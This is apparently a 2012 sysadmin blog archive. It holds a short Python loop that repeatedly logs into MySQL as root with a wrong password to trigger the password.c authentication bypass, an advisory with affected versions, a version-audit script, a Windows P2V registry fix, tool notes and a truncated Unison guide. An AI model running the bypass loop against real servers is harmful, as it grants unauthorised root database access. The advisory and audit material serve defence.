Showing posts from June, 2012

Python Script to Test MySQL password.c hack

vi /root/MySQLByPass.py
==========
#!/usr/bin/python
import subprocess

# Loop until interrupted: each pass attempts a root login with a wrong password ("xx")
while 1:
    subprocess.Popen("mysql -u root mysql --password=xx",shell=True).wait()
==========
python /root/MySQLByPass.py

Security vulnerability in MySQL/MariaDB

A vulnerability has been identified in MySQL and MariaDB.

Basically, under specific conditions it is possible for an attacker to provide any password and it will be accepted.

The source file affected is password.c.

You can find a more detailed explanation and a fix here:

http://seclists.org/oss-sec/2012/q2/493

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

If you know a username (root in most cases), a situation arises where, if you connect approx 250 to 300 times, MySQL will allow you to connect without any password.
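To check an inventory of servers against the version lists above, here is an added example (not code from the original post or the linked advisory) that parses `SELECT VERSION()` style strings and reports which ones are older than the fixed release for their branch. The function names, the handling of branches the post does not list, and the sample inventory are assumptions made for this example.

```python
import re

# Fixed releases per branch, copied from the version lists in the post above.
FIXED = {
    "mariadb": {(5, 1): 62, (5, 2): 12, (5, 3): 6, (5, 5): 23},
    "mysql": {(5, 1): 63, (5, 5): 24, (5, 6): 6},
}

# MariaDB 10.x prefixes its handshake banner with "5.5.5-"; skip that prefix
# when a full version follows it, so such servers are not misread as 5.5.5.
_VERSION = re.compile(r"\s*(?:5\.5\.5-)?(\d+)\.(\d+)\.(\d+)")


def parse_version(banner):
    """Return (flavour, (major, minor, patch)) for a SELECT VERSION() string."""
    m = _VERSION.match(banner)
    if not m:
        raise ValueError("unrecognised version string: %r" % (banner,))
    flavour = "mariadb" if "mariadb" in banner.lower() else "mysql"
    return flavour, tuple(int(part) for part in m.groups())


def in_affected_range(banner):
    """True if the version is older than the fixed release for its branch."""
    flavour, (major, minor, patch) = parse_version(banner)
    fixed = FIXED[flavour]
    branch = (major, minor)
    if branch in fixed:
        return patch < fixed[branch]
    # Assumption: a branch with no fixed release listed is affected if it is
    # older than the newest listed branch, and fixed if it is newer.
    return branch < max(fixed)


def audit(inventory):
    """Map host -> banner to the sorted hosts that still need patching.

    A hit means "check further": distribution packages can carry a backported
    fix under an older upstream version number.
    """
    return sorted(h for h, b in inventory.items() if in_affected_range(b))


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    sample = {"db1": "5.5.22-0ubuntu1", "db2": "5.5.23-MariaDB",
              "db3": "5.0.95", "db4": "5.5.5-10.0.17-MariaDB"}
    print(audit(sample))
```

Whether a build in the affected range actually accepts a wrong password depends on the specific conditions described in the linked advisory, so a version match is a reason to patch, not proof of exposure.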

Windows 7 P2V 0xc0000225 and 0x0000007b Error

This was a procedure I found on the web to resolve errors 0xc0000225 and 0x0000007b when booting a virtual Windows 7 system after performing a P2V.


1. Mount the Win7 DVD in VMware Workstation using the removable media options, or else change the BIOS setting in the VM so it will boot from an ISO image.
2. At the first screen (Language Selection), hit Shift-F10 for a command prompt.
3. Run Regedit.
4. Highlight HKEY_LOCAL_MACHINE.
5. Load the system hive from the VM's disk: File > Load Hive.
6. Select < c: > \Windows\System32\config\system
7. Regedit will ask for a Key name: name it something like "asdf".
8. Expand HKEY_LOCAL_MACHINE\asdf\ControlSet001\Services\intelide
9. Change the data for value "Start" from "3" to "0".
10. For each service listed below under HKLM/System/CurrentControlSet001/Services/ set the "Start" parameter to the corresponding value from the list below:

Aliide = 3
Amdide = 3
Atapi = 0
Cmdide = 3
iaStorV = 3
intelide = 0
msahci = 3
pciide = 3
viaide …

Chive May Replace phpMyAdmin

Chive is a Web 2.0 front end for SQL database management.

http://www.chive-project.com/

Simple Windows Monitoring with PolyMon

PolyMon is an open source system monitoring solution that can be used to generate email alerts and analyze historical trends of monitor counters and monitor statuses.

It is based on the .NET 2.0 framework and SQL Server 2005.

The most recent version integrates with Visual Studio 2010.

http://polymon.codeplex.com/

I write some software using VB.NET and C# and this is ideal as an add-on, where I can extend it to allow me to monitor application-specific logs.

Using Unison to Take MySQL Copy

Recently I needed to take a copy of a MySQL database dump on a regular basis from a remote CentOS database server hosted in a data centre in the UK, onto a Windows Server based in Ireland also running a similar version of MySQL.

We require a copy of the data on an hourly basis.

So I decided to try out Unison to synchronize folders between a remote server and a local server.

Windows Server

First, download Unison from
http://www.cis.upenn.edu/~bcpierce/unison/download.html

When I downloaded the latest binary option for Windows, I got two files: one is the text/command-line tool and the other is an application based on GTK.

I took a copy of the command-line application, created a folder called c:\unison and dropped my file into that folder. You will also need to grab a copy of an SSH client that will run under Windows. You can go with something like Cygwin, but I wanted something that was quick to install and had a small footprint, so I selected

OpenSSH for Windows
http://sshwindo…